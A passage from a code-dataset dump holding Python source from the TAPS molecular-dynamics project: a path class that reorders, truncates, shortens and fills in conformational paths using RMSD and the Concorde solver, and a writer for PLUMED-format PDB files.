fr.read()\n\t\t\t\tfr.close()\n\t\t\t\t\n\t\t\t\tfw = open(tmpCVfile, 'w')\n\t\t\t\t# remove any line that includes '#'\n\t\t\t\tpdata = re.sub('#.*\\n', '', lines)\n\t\t\t\tprint(pdata, file=fw)\n\t\t\t\tfw.close()\n\t\t\t\t# store in self.pcvs\n\t\t\t\tcvs = np.loadtxt(tmpCVfile, dtype=float)\n\t\t\t\tif trj.n_frames == 1:\n\t\t\t\t\ts = cvs[1]\n\t\t\t\t\tz = cvs[2]\n\t\t\t\telse:\n\t\t\t\t\ts = cvs[:, 1]\n\t\t\t\t\tz = cvs[:, 2]\n\t\t\t\tos.remove(tmpCVfile)\n\t\t\t\tos.remove(tmpOutFile)\n\t\t\t\tos.remove(pluInput)\n\t\t\t\tos.remove(trjFile)\n\t\t\t\tos.remove(pluPdbFile)\n\t\t\t\treturn s, z\n\t\t\telse:\n\t\t\t\traise ValueError(\"nodes must be an instance of mdtraj.Trajectory or TAPS.Confs\")\n\n\t# ==================================================================================================================\n\t# load path from a trajectory, computes PCV of this path automatically after loading\n\t# ==================================================================================================================\n\tdef loadFromTRJ(self, trajName, topName):\n\t\tself.nodes = Confs.traj2conf(md.load(trajName, top=topName))\n\t\tself.n_nodes = self.nodes.n_frames\t\t\n\n\t# ==================================================================================================================\n\t# export each node as pdb for MD/MetaD, must include all atoms of the system\n\t# 
==================================================================================================================\n\tdef exportFrames(self):\n\t\tfor i in range(self.n_nodes):\n\t\t\tnd=self.nodes.slice(i)\n\t\t\tnd.save(self.pathName+'_node'+str(i)+'.pdb')\n\n\t# ==================================================================================================================\n\t# export all nodes into a trajectory file under a specified directory\n\t# ==================================================================================================================\n\tdef exportPath(self, dire):\n\t\tself.nodes.save(dire + '/' + self.pathName+'.xtc')\n\n\t# ==================================================================================================================\n\t# export all nodes as a Plumed pdb file for PCV computation\n\t# ==================================================================================================================\n\tdef exportPCV(self, dire):\n\t\tpluPdbFile = self.pathName + \"_plu.pdb\"\n\t\tif type(self.nodes) is Confs:\n\t\t\tself.nodes.save_plu2(dire+'/'+pluPdbFile,self.pcvInd)\n\t\telse:\n\t\t\traise ValueError(\"nodes must be an instance of the class Confs\")\n\n\t# ==================================================================================================================\n\t# use concorde to generate new order of the n_nodes#######Pay attention! Concorde!\n\t# ==================================================================================================================\n\tdef reOrder(self, doPBC=False, dire=None):\n\t\t# generate RMSD matrix for concorde\n\t\tdist = np.zeros((self.n_nodes+1, self.n_nodes+1))\n\t\tif doPBC:\n\t\t\tself.nodes.image_molecules()\n\t\tpluAtoms = self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\tpluAtoms.superpose(pluAtoms, 0, self.pcvInd.align)\n\t\tfor i in range(self.n_nodes):\n\t\t\tdist[i][0:self.n_nodes] = md.rmsd(pluAtoms, pluAtoms, i, self.pcvInd.rms)\n\t\tnp.savetxt('rmsd.conc', dist*1000, fmt='%d')\n\t\tfc = open('head.conc', 'w')\n\t\tprint(\"NAME: RMSD\",file=fc)\n\t\tprint(\"TYPE: TSP\", file=fc)\n\t\tprint(\"DIMENSION: %d\" % (self.n_nodes+1), file=fc)\n\t\tprint(\"EDGE_WEIGHT_TYPE: EXPLICIT\", file=fc)\n\t\tprint(\"EDGE_WEIGHT_FORMAT: FULL_MATRIX\", file=fc)\n\t\tprint(\"EDGE_WEIGHT_SECTION:\", file=fc)\n\t\tfc.close()\n\n\t\t# ==============================================================================================================\n\t\t# combine two files as input for concorde\n\t\t# ==============================================================================================================\n\t\trmsdINT = self.pathName + '.conc'\n\t\tfiles = ['head.conc', 'rmsd.conc']\t# head.conc - input records #\n\t\twith open(rmsdINT, 'w') as combine:\n\t\t\tfor file_ in files:\n\t\t\t\tfor line in open(file_, 'r'):\n\t\t\t\t\tcombine.write(line)\n\t\tcmd = \"concorde %s\" % rmsdINT\n\t\tos.system(cmd) # run concorde\n\n\t\t# read concorde output and get new order\n\t\tresult = self.pathName + '.sol'\n\t\tfr = open(result,'r+')\n\t\tlines = fr.readlines()\n\t\tfr.close()\n\n\t\tlines.pop(0) # remove the first line\n\t\ttmp=''.join(lines).replace('\\n', '').split(' ')\n\t\ttmp.remove('')\n\t\tnds=np.array(list(map(int,tmp)),dtype=int) # index before reorder\n\t\tbrk=np.argmax(nds) # maxvalue is the virtual node\n\t\torder = np.append(nds[(brk + 1):len(nds)], nds[0:brk])\n\n\t\t# If initial node is after final node in new order, reverse the order \n\t\tsi = np.where(order == 0)[0]\n\t\tti = 
np.where(order == len(order)-1)[0]\n\t\tif si > ti:\n\t\t\torder = order[::-1]\n\n\t\t#t0=time.time()\n\n\t\t# reorder the median(z) conformations as new path nodes\n\t\tnewList = []\n\t\tori = []\n\t\tfor i in range(len(order)):\n\t\t\tnode = self.nodes.slice(order[i]) # nodes are Confs instances\n\t\t\tnewList.append(node)\n\t\t\tori.append(self.oriDIR[order[i]])\n\t\t#print('+++DEBUG+++ reOrdered oriDIR = ', ori)\n\t\t#t1=time.time()\n\t\t#print('+++DEBUG+++ Slicing nodes took', t1-t0, 'sec') \n\n\t\t#t0=time.time()\n\t\tself.nodes = Confs.merge(newList)\n\t\t#t1=time.time()\n\t\t#print('+++DEBUG+++ Merging nodes took', t1-t0, 'sec') \n\t\tself.n_nodes = len(self.nodes)\t\t\n\t\tself.pcv(dire=dire)\n\t\tself.oriDIR=ori\n \n\t\t# clean up concorde files\n\t\tfor f in glob.glob(\"*.sav\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.pul\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.mas\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.conc\"):\n\t\t\tos.remove(f)\n\t\tfor f in glob.glob(\"*.sol\"):\n\t\t\tos.remove(f)\n\n\t# ==================================================================================================================\n\t# Truncate the nodes of path beyond the two fixed terminals\n\t# ==================================================================================================================\n\tdef truncate(self, iNode, fNode):\n\t\tori = deepcopy(self.oriDIR)\n\t\tif (iNode is None) or (fNode is None):\n\t\t\traise ValueError(\"the two terminal nodes must be provided for truncation\")\n\t\telse:\n\t\t\tinitNode = deepcopy(iNode)\n\t\t\tfinNode = deepcopy(fNode)\n\t\t\tsub_nodes=self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_i = initNode.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_f = finNode.atom_slice(self.pcvInd.atomSlice)\n\t\t\tsub_nodes.superpose(sub_i,0,self.pcvInd.align)\n\t\t\tr1 = md.rmsd(sub_nodes,sub_i,0,self.pcvInd.rms)\n\t\t\tsi = np.argmin(r1)\t#gives the index of the minimum value of r1 (md.rmsd) along axis 0#\n\t\t\tsub_nodes.superpose(sub_f,0, self.pcvInd.align)\n\t\t\tr2 = md.rmsd(sub_nodes,sub_f,0,self.pcvInd.rms)\t\n\t\t\tti = np.argmin(r2)\t#search for indices of initial and final conformations#\n\t\t\tif si > ti:\t#add initial and final nodes to the two terminals#\n\t\t\t\t# add self.initNode and self.finNode at terminals\n\t\t\t\tlistNodes = []\n\t\t\t\tlistNodes.append(finNode)\n\t\t\t\tlistNodes.append(self.nodes.slice(np.arange(ti, si + 1)))\n\t\t\t\tlistNodes.append(initNode)\n\t\t\t\tnewNodes = Confs.merge(listNodes)\n\t\t\t\tori=ori[ti:(si+1)]\n\t\t\telse:\n\t\t\t\t# add self.initNode and self.finNode at terminals\n\t\t\t\tlistNodes = []\n\t\t\t\tlistNodes.append(initNode)\n\t\t\t\tlistNodes.append(self.nodes.slice(np.arange(si, ti + 1))) \n\t\t\t\tlistNodes.append(finNode)\n\t\t\t\tnewNodes = Confs.merge(listNodes)\t\t\t\n\t\t\t\tori=ori[si:(ti+1)]\n\t\t\tori.insert(len(ori)-1,ori[len(ori)-1])\n\t\t\tori.insert(0,ori[0])\n\t\t\tnewPath = Path(self.pathName+'_tr',self.pcvInd,newNodes,ori)\n\t\t\t#print('+++DEBUG+++ truncated oriDIR = ', ori)\n\t\treturn newPath\n\n\t# ==================================================================================================================\n\t# Shorten the path by skipping nodes i-j if d[i-1,j+1] is already shorter than the tolerable maximum distance;\n\t# finding short-cuts (if any) avoids unnecessary curvature and loops;\n\t# This will make the path as straight as the sampled data allows\n\t# 
==================================================================================================================\n\tdef rmClose(self,tolDist,doPBC=False):\n\t\tori = deepcopy(self.oriDIR)\n\t\t# prepare for rmsd computation\n\t\tpathConfs = self.nodes\n\t\tif doPBC:\n\t\t\tpathConfs.image_molecules()\n\t\tsub_confs = pathConfs.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_confs.superpose(sub_confs, 0, self.pcvInd.align)\n\t\ti = 0 # starting from the first node\n\t\twhile (i < pathConfs.n_frames):\n\t\t\tdistances = md.rmsd(sub_confs, sub_confs, i, self.pcvInd.rms)\n\t\t\t# make the self-distance ultra-large so a node cannot short-cut to itself\n\t\t\tdistances[i]=1000000000\n\t\t\tshortcuts = np.where(distances <= tolDist)[0]\n\t\t\t# print('number of nodes in path: ', pathConfs.n_frames)\n\t\t\t# print('short-cuts = ',shortcuts)\n\t\t\tif (len(shortcuts) <= 0): # no short-cuts found, move to the next node\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tscID = np.max(shortcuts)\n\t\t\t\tif (scID>i):\n\t\t\t\t\t# print('node', i, ' short-cut to node', scID)\n\t\t\t\t\t# scID is not yet the last frame, cut the frames in between out\n\t\t\t\t\tif (scID < (pathConfs.n_frames - 1)):\n\t\t\t\t\t\tcuts = np.append(np.array(range(i + 1)), np.array(range(scID, pathConfs.n_frames)))\n\t\t\t\t\t\t# print('cuts=',cuts)\n\t\t\t\t\t\tsub_confs = sub_confs.slice(cuts)\n\t\t\t\t\t\tpathConfs = pathConfs.slice(cuts)\n\t\t\t\t\t\tdel ori[(i+1):scID]\n\t\t\t\t\t\ti += 1\n\t\t\t\t\t# already the last frame in path, jump out of loop\n\t\t\t\t\telse:\n\t\t\t\t\t\tcuts = np.append(np.array(range(i + 1)), np.array(range(scID, pathConfs.n_frames)))\n\t\t\t\t\t\t# print('cuts=', cuts)\n\t\t\t\t\t\tsub_confs = sub_confs.slice(cuts)\n\t\t\t\t\t\tpathConfs = pathConfs.slice(cuts)\n\t\t\t\t\t\t# update information about original directory of the remaining nodes \n\t\t\t\t\t\tdel ori[(i+1):scID]\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ti+=1 # closest node appears before the current node; move to the next node\n\t\tnewPath = Path(self.pathName + '_rc', self.pcvInd, pathConfs, ori)\n\t\treturn newPath\n\n\t# ==================================================================================================================\n\t# Insert conformations between neighbor nodes i,i+1, if d[i,i+1] > tolerable maximum distance\n\t# 1. ensure conformation f is closer to nodes i and i+1 than to other nodes on the path\n\t# 2. ensure conformation f lies midway between nodes i,i+1: |d[f,i]-d[f,i+1]| < (d[i,i+1]*devMID)\n\t# 3. ensure cosTheta = (d[i,f]**2 + d[i+1,f]**2 - d[i,i+1]**2) / (2*d[i,f]*d[i+1,f]) < tolCos\n\t# 4. 
finding short-cuts (if any) avoids unnecessary curvature and loops, using function rmClose\n\t# traj is an mdtraj.Trajectory object or a Confs object\n\t# NOTE THAT distantNB shall be a 1D numpy array; dire is where the traj data is located\n\t# ==================================================================================================================\n\tdef insert(self, traj, dire=None, tolDist=0.015, devMID=0.1, tolCos=0, doPBC=False, distantNB = None):\n\t\t#==================================================================================\n\t\t# copy current nodes into a path, prepare for rmsd computation \n\t\t#==================================================================================\n\t\tpathConfs = deepcopy(self.nodes)\n\t\tif doPBC:\n\t\t\tpathConfs.image_molecules()\n\t\t#t0 = time.time()\n\t\tsub_opath = pathConfs.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_opath.superpose(sub_opath, 0, self.pcvInd.align)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Insertion: path superposition took \", t1 - t0, ' sec')\n\n\t\t#==================================================================================\n\t\t# prepare data for rmsd computation\n\t\t#==================================================================================\n\t\t# align sampled data to the first node of path\n\t\ttrj = traj\n\t\tif doPBC:\n\t\t\ttrj.image_molecules()\n\t\t#t0 = time.time()\n\t\tsub_data = trj.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_data.superpose(sub_opath, 0, self.pcvInd.align)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Insertion: trjData superposition took \", t1 - t0, ' sec')\n\n\t\t#==============================================================================================\n\t\t# Decide which pairs of neighbor nodes are distant (> tolDist)\n\t\t#============================================================================================== \n\t\t# if provided as input (distantNB), insertion is only performed in that pair\n\t\t#==============================================================================================\n\t\tif distantNB is not None:\n\t\t\ttoInsert = deepcopy(distantNB)\n\t\t#==============================================================================================\n\t\t# otherwise, scan the initial path, label the neighbors whose distance is larger than tolDist\n\t\t#==============================================================================================\n\t\telse:\n\t\t\ttmp = []\n\t\t\tfor i in range((sub_opath.n_frames - 1)):\n\t\t\t\tdist = md.rmsd(sub_opath.slice(i), sub_opath.slice(i + 1), 0, self.pcvInd.rms)\n\t\t\t\tif dist > tolDist:\n\t\t\t\t\ttmp.append(i)\n\t\t\ttoInsert = np.array(tmp)\n\t\t# print('+++DEBUG+++ toInsert=',toInsert)\n\n\t\t#=============================================================================================\n\t\t# remove the path nodes from the dataset\n\t\t#=============================================================================================\n\t\t#t0 = time.time()\n\t\tfor i in range(sub_opath.n_frames):\n\t\t\tdist = md.rmsd(sub_data, sub_opath.slice(i), 0, self.pcvInd.rms)\n\t\t\tind_zero = np.where(dist > 0)[0]\n\t\t\tsub_data = sub_data.slice(ind_zero)\n\t\t\ttrj = trj.slice(ind_zero)\n\t\t#t1 = time.time()\n\t\t#print(\"+++DEBUG+++ Node removal from trjData took \", t1 - t0, ' sec')\n\n\t\tori = deepcopy(self.oriDIR)\n\t\twhile len(toInsert) > 0:\n\t\t\ti1 = toInsert[0]\n\t\t\ti2 = i1 + 1\n\t\t\t# print('+++DEBUG+++ Searching for conformations to insert between node %d & %d' % 
(i1,i2))\n\t\t\t#==========================================================================================\n\t\t\t# Criterion 1: conf to insert must be closer to the i1 or i2 than any other nodes\n\t\t\t#==========================================================================================\n\t\t\t# loop over all path nodes\n\t\t\tdists = np.empty([sub_opath.n_frames, sub_data.n_frames])\n\t\t\tfor i in range(sub_opath.n_frames):\n\t\t\t\tdists[i] = md.rmsd(sub_data, sub_opath, i, self.pcvInd.rms)\n\t\t\tr1 = dists[i1]\n\t\t\tr2 = dists[i2]\n\t\t\tind_data = np.arange(sub_data.n_frames)\n\t\t\tr12 = md.rmsd(sub_opath.slice(i1), sub_opath.slice(i2), 0, self.pcvInd.rms)\n\t\t\t# Criterion 2: |r1-r2|< r12/scale_r12, i.e. conf to insert must be in the middle of i1,i2\n\t\t\tscale_r12 = 0.01\n\t\t\twhile (scale_r12 < devMID):\n\t\t\t\tlogic_mid = (np.absolute(r1 - r2) < (r12 * scale_r12)) # r1-r2->0\n\t\t\t\t# print('+++DEBUG+++ logic_mid at scale_r12=', scale_r12, ': ',np.where(logic_mid)[0].size)\n\t\t\t\tcosTheta = (r1 ** 2 + r2 ** 2 - r12 ** 2) / (2 * r1 * r2)\n\t\t\t\t# Criterion 3: cos(Theta) must be smaller than preset-value\n\t\t\t\tlogic_cos = (cosTheta < tolCos) # cosTheta < 0, theta > 90 degrees\n\t\t\t\tlogic_candidate = (logic_mid & logic_cos)\n\t\t\t\t# print('+++DEBUG+++ logic_both at scale_r12=', scale_r12, ': ',np.where(logic_candidate)[0].size)\n\t\t\t\tn_candidate = np.where(logic_candidate)[0].size\n\t\t\t\tif n_candidate > 0: # if jump out of loop and proceed\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tscale_r12 *= 2\n\t\t\t# print('+++DEBUG+++ number of candidates: %d' % n_candidate)\n\t\t\t# if there is data meeting both criteria, select the min(cos(Theta))\n\t\t\tif n_candidate > 0:\n\t\t\t\tind_candidate = ind_data[logic_candidate]\n\t\t\t\tsel = ind_candidate[np.argmin(cosTheta[logic_candidate])] # find the candidate index in original data\n\t\t\t\t# print('+++DEBUG+++ Found conformations between %d-%d, in data[%d]' % (i1, i2, sel))\n\t\t\t\ttmp = []\n\t\t\t\ttmp.append(Confs.traj2conf(pathConfs.slice(range(i2))))\n\t\t\t\ttmp.append(Confs.traj2conf(trj.slice(sel)))\n\t\t\t\ttmp.append(Confs.traj2conf(pathConfs.slice(range(i2, len(pathConfs)))))\n\t\t\t\tpathConfs = Confs.merge(tmp)\n\n\t\t\t\t# PathConfs.insert(i2, trj.slice(sel))\n\t\t\t\ttmp = []\n\t\t\t\ttmp.append(Confs.traj2conf(sub_opath.slice(range(i2))))\n\t\t\t\ttmp.append(Confs.traj2conf(sub_data.slice(sel)))\n\t\t\t\ttmp.append(Confs.traj2conf(sub_opath.slice(range(i2, len(sub_opath)))))\n\t\t\t\tsub_opath = Confs.merge(tmp)\n\t\t\t\t# print('+++DEBUG+++ inserted pathConfs=', pathConfs) \n\n\t\t\t\t# update original directory where nodes are extracted\n\t\t\t\tori.insert(i2,dire)\n\n\t\t\t\t# remove the conformation from dataset\n\t\t\t\tind_data = np.delete(ind_data, sel)\n\t\t\t\t# print('+++DEBUG+++ Removing selected conformation from dataset, %d conformations left' % len(ind_data))\n\t\t\t\ttrj = trj.slice(ind_data)\n\t\t\t\tsub_data = sub_data.slice(ind_data)\n\t\t\t\t# update the list toInsert\n\t\t\t\t# if r1,r2 > tolDist, extra insertion is still needed in both pairs\n\t\t\t\tif ((r1[sel] > tolDist) and (r2[sel] > tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel],'>',tolDist,'\\t',r2[sel],'>',tolDist)\n\t\t\t\t\ttoInsert[1:len(toInsert)] = toInsert[1:len(toInsert)] + 1\n\t\t\t\t\ttoInsert = np.insert(toInsert, 1, i2)\n\t\t\t\t# if r1,r2 <= tolDist, extra insertion is not necessary\n\t\t\t\telif ((r1[sel] <= tolDist) and (r2[sel] <= tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '<=', 
tolDist, '\\t', r2[sel], '<=', tolDist)\n\t\t\t\t\ttoInsert = toInsert + 1\n\t\t\t\t\ttoInsert = np.delete(toInsert, 0) \n\n\t\t\t\t# if r1<=tolDist, r2>tolDist, only insert between newly inserted conf and i2\n\t\t\t\telif ((r1[sel] <= tolDist) and (r2[sel] > tolDist)):\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '<=', tolDist, '\\t', r2[sel], '>', tolDist)\n\t\t\t\t\ttoInsert = toInsert + 1\n\t\t\t\t# if r1>tolDist, r2<=tolDist, only insert between i1 and newly inserted\n\t\t\t\telse:\n\t\t\t\t\t# print('+++DEBUG+++ ', r1[sel], '>', tolDist, '\\t', r2[sel], '<=', tolDist)\n\t\t\t\t\ttoInsert[1:len(toInsert)] = toInsert[1:len(toInsert)] + 1\n\t\t\t\t\t# print('+++DEBUG+++ toInsert=', toInsert)\n\t\t\t\t#print('+++DEBUG+++ inserted oriDIR = ', ori)\n\t\t\telse:\n\t\t\t\t# print('No conformation found between %d-%d' % (i1,i2))\n\t\t\t\ttoInsert = np.delete(toInsert,0)\n\t\t\t\t# print('+++DEBUG+++ after trial toInsert=',toInsert)\n\t\t#print('+++DEBUG+++ inserted oriDIR = ', ori)\n\t\treturn Path(self.pathName + '_in', self.pcvInd, pathConfs, ori)\n\n\t# ==================================================================================================================\n\t# Find neighbours that are distant (rmsd > cutoff)\n\t# return a list of mdtraj.trajectory objects, each containing only the two distant neighbor nodes\n\t# =================================================================================================================\n\tdef distantNeighbors(self, tolDist=0.015, doPBC=False):\n\t\t# copy path nodes\n\t\tnodes = deepcopy(self.nodes)\n\t\tn = nodes.n_frames\n\t\t# compute rmsd between neighbor nodes\n\t\tif doPBC:\n\t\t\tnodes.image_molecules()\n\t\tsub_nodes = nodes.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_nodes.superpose(sub_nodes, 0, self.pcvInd.align)\n\n\t\tfarFirst=[] \n\t\tlistDistant = []\n\t\tlistDIRs=[]\n\t\t# find all distant pairs, recording by first node of each pair in farFirst\n\t\t# extract the terminal nodes for subsequent tmd simulations \n\t\t# extract the original DIRs from which the node was extracted in this iteration\n\t\tfor i in range(n-1):\n\t\t\tdist = md.rmsd(sub_nodes.slice(i), sub_nodes.slice(i+1), 0, self.pcvInd.rms)\n\t\t\t#print('+++DEBUG+++ dist[',i,'][',i+1,']=',dist)\n\t\t\tif dist > tolDist:\n\t\t\t\tfarFirst.append(i)\n\t\t\t\tlistDistant.append(nodes.slice([i,i+1]))\n\t\t\t\t#print('+++DEBUG+++ i=',i)\n\t\t\t\t#print('+++DEBUG+++ oriDIR[i]=',self.oriDIR[i])\n\t\t\t\t#print('+++DEBUG+++ oriDIR[i+1]=',self.oriDIR[i+1])\n\t\t\t\tlistDIRs.append([self.oriDIR[i],self.oriDIR[i+1]])\n\n\t\t#print('+++DEBUG+++ farFirst=',farFirst)\n\t\t#print('+++DEBUG+++ listDIRs=',listDIRs)\n\n\t\t# cut path into segments\n\t\tsegInd=[] # segments indices of path\n\t\tnfar = len(farFirst)\n\t\tif nfar == 0:\n\t\t\t# no distant pairs: the whole path is one segment and nothing needs resampling\n\t\t\treturn (listDistant, listDIRs, [list(range(n))], [])\n\t\tif farFirst[0]>0:\n\t\t\tsegInd.append(list(range(0,farFirst[0])))\n\t\tfor i in range(nfar-1):\n\t\t\tsegInd.append(list(range(farFirst[i],farFirst[i]+2)))\n\t\t\tif (farFirst[i]+2)<farFirst[i+1]:\n\t\t\t\tsegInd.append(list(range(farFirst[i]+2,farFirst[i+1])))\n\t\t\t#print('+++DEBUG+++ segInd=',segInd)\n\t\tsegInd.append(list(range(farFirst[nfar-1],farFirst[nfar-1]+2)))\n\t\tif (farFirst[nfar-1]+1) < (n-1):\n\t\t\tsegInd.append(list(range(farFirst[nfar-1]+2,n)))\n\t\t\t#print('+++DEBUG+++ segInd=',segInd)\n\t\t# generate mapping from farFirst to which segments \n\t\tfarInSeg=[]\n\t\tj=0\n\t\tfor i in range(len(segInd)):\n\t\t\tif farFirst[j] == segInd[i][0]:\n\t\t\t\tfarInSeg.append(i)\n\t\t\t\tj+=1\n\t\t\t\tif j>=nfar:\n\t\t\t\t\tbreak\n\t\t\t#print('+++DEBUG+++ 
farInSeg=',farInSeg)\n\t\t#print('+++DEBUG+++ farInSeg=',farInSeg)\n\t\treturn (listDistant, listDIRs, segInd, farInSeg)\n \n\tdef pSlice(self, ind): # ind is a list \n\t\tsegNodes = Confs.traj2conf(self.nodes.slice(ind))\n\t\tsegDIR = [self.oriDIR[i] for i in ind] \t\t\t\n\t\tsegPath = Path(\"seg\", self.pcvInd, segNodes, segDIR)\n\t\treturn segPath\n"
},
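A small numeric check of the triangle criterion used by `Path.insert` above: a candidate conformation f between distant neighbors i and i+1 is accepted only if the angle at f is obtuse, i.e. cosθ = (r1² + r2² − r12²)/(2·r1·r2) < tolCos (tolCos defaults to 0). The distance values below are made up for illustration:

```python
# Law-of-cosines acceptance test from Path.insert, on illustrative RMSD values (nm).
def cos_theta(r1, r2, r12):
    # r1 = d(f, node i), r2 = d(f, node i+1), r12 = d(node i, node i+1)
    return (r1**2 + r2**2 - r12**2) / (2 * r1 * r2)

r12 = 0.030                            # a distant neighbor pair (> tolDist)
print(cos_theta(0.017, 0.018, r12))    # negative -> obtuse angle at f, accepted
print(cos_theta(0.030, 0.045, r12))    # positive -> acute angle at f, rejected
```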
{
"alpha_fraction": 0.6534839868545532,
"alphanum_fraction": 0.6758138537406921,
"avg_line_length": 40.7528076171875,
"blob_id": "95895ad8579cb41891388f54035f2ee7ede0e72e",
"content_id": "62984abd0e929baf7870d5036ea41ac6b77081cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3717,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 89,
"path": "/PluPDB.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\nimport numpy as np\nfrom mdtraj.utils import ilen\nimport mdtraj.formats.pdb.pdbfile as pdb\n\ndef _format_83(f):\n\t\"\"\"Format a single float into a string of width 8, with ideally 3 decimal\n\tplaces of precision. If the number is a little too large, we can\n\tgracefully degrade the precision by lopping off some of the decimal\n\tplaces. If it's much too large, we throw a ValueError\"\"\"\n\tif -999.999 < f < 9999.999:\n\t\treturn '%8.3f' % f\n\tif -9999999 < f < 99999999:\n\t\treturn ('%8.3f' % f)[:8]\n\traise ValueError('coordinate \"%s\" could not be represented '\n\t\t'in a width-8 field' % f)\n\nclass PluPDBfile(pdb.PDBTrajectoryFile):\n\tdef __init__(self, filename, mode='r', force_overwrite=True, standard_names=True):\n\t\tpdb.PDBTrajectoryFile.__init__(self, filename, mode, force_overwrite) #, standard_names)\n\t\t# pdb.PDBTrajectoryFile.__init__(self, filename, mode, force_overwrite, standard_names)\n\t\t# do not write footer; footer will add an extra END at the last line and causes crash of plumed\n\t\tself._footer_written = True\n\n\tdef write(self, positions, topology, frame_ind=None, pcv_ind=None, unitcell_lengths=None,\n\t\tunitcell_angles=None):\n\t\t\"\"\"Write a PDB file to disk using plumed2 PCV format\n\n\t\tParameters\n\t\t----------\n\t\tpositions : array_like\n\t\t\tThe list of atomic positions to write.\n\t\ttopology : mdtraj.Topology\n\t\t\tThe Topology defining the model to write.\n\t\tframe_ind : {int, None}\n\t\t\tIf not None, the index of frames will be surrounded by REMARK X=? and END\n\t\tunitcell_lengths : {tuple, None}\n\t\t\tLengths of the three unit cell vectors, or None for a non-periodic system\n\t\tunitcell_angles : {tuple, None}\n\t\t\tAngles between the three unit cell vectors, or None for a non-periodic system\n\t\t\"\"\"\n\t\tif not self._mode == 'w':\n\t\t\traise ValueError('file not opened for writing')\n\t\tif not self._header_written:\n\t\t\tself._write_header(unitcell_lengths, unitcell_angles)\n\t\t\tself._header_written = True\n\n\t\tif ilen(topology.atoms) != len(positions):\n\t\t\traise ValueError('The number of positions must match the number of atoms')\n\t\tif np.any(np.isnan(positions)):\n\t\t\traise ValueError('Particle position is NaN')\n\t\tif np.any(np.isinf(positions)):\n\t\t\traise ValueError('Particle position is infinite')\n\n\t\tself._last_topology = topology # Hack to save the topology of the last frame written, allows us to output CONECT entries in write_footer()\n\n\t\tposIndex = 0\n\t\tif frame_ind is not None:\t#Finished#\n\t\t\tprint(\"REMARK X=%d\" % frame_ind, file=self._file)\n\t\t\tfor (chainIndex, chain) in enumerate(topology.chains):\n\t\t\t\tchainName = self._chain_names[chainIndex % len(self._chain_names)]\n\t\t\t\tresidues = list(chain.residues)\n\t\t\t\tfor (resIndex, res) in enumerate(residues):\n\t\t\t\t\tif len(res.name) > 3:\n\t\t\t\t\t\tresName = res.name[:3]\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tresName = res.name\n\t\t\t\t\tfor atom in res.atoms:\n\t\t\t\t\t\tif len(atom.name) < 4 and atom.name[:1].isalpha() and (\n\t\t\t\t\t\t\tatom.element is None or len(atom.element.symbol) < 2):\n\t\t\t\t\t\t\tatomName = ' ' + atom.name\n\t\t\t\t\t\telif len(atom.name) > 4:\n\t\t\t\t\t\t\tatomName = atom.name[:4]\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tatomName = atom.name\n\t\t\t\t\t\tcoords = positions[posIndex]\n\t\t\t\t\t\tif atom.element is not None:\n\t\t\t\t\t\t\tsymbol = atom.element.symbol\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsymbol = ' '\n\t\t\t\t\t\tline = 
\"ATOM %5d %-4s %3s %1s%4d %s%s%s %5.2f %5.2f %-4s%-2s \" % (\n\t\t\t\t\t\t\tpcv_ind.atomInd[posIndex] % 100000, atomName, resName, chainName,\n\t\t\t\t\t\t\t(res.resSeq) % 10000, _format_83(coords[0]),\n\t\t\t\t\t\t\t_format_83(coords[1]), _format_83(coords[2]),\n\t\t\t\t\t\t\tpcv_ind.alignPLU[posIndex], pcv_ind.rmsPLU[posIndex], atom.segment_id[:4], symbol[-2:])\n\t\t\t\t\t\tassert len(line) == 80, 'Fixed width overflow detected'\n\t\t\t\t\t\tprint(line, file=self._file)\n\t\t\t\t\t\tposIndex += 1\n\t\t\tprint(\"END\", file=self._file)\n\n"
},
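The `_format_83` helper above implements the fixed-width coordinate fields of the PDB format: 8 characters wide, ideally `%8.3f`, with precision degraded for values that would overflow. Copied here verbatim for a standalone demonstration on sample values:

```python
# Behavior of _format_83 (width-8 PDB coordinate fields) from PluPDB.py.
def _format_83(f):
    if -999.999 < f < 9999.999:
        return '%8.3f' % f
    if -9999999 < f < 99999999:
        return ('%8.3f' % f)[:8]          # lop off decimals to stay in 8 chars
    raise ValueError('coordinate "%s" could not be represented '
                     'in a width-8 field' % f)

print(repr(_format_83(1.5)))       # '   1.500' -> full 3-decimal precision
print(repr(_format_83(12345.6)))   # '12345.60' -> precision degraded to fit
```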
{
"alpha_fraction": 0.6381083130836487,
"alphanum_fraction": 0.6463330984115601,
"avg_line_length": 39.47222137451172,
"blob_id": "138a44e657d32588a14963a6889da26a2406ace4",
"content_id": "559c60118de6b543028964e13054bfcaaf18c08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1459,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 36,
"path": "/PcvInd.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
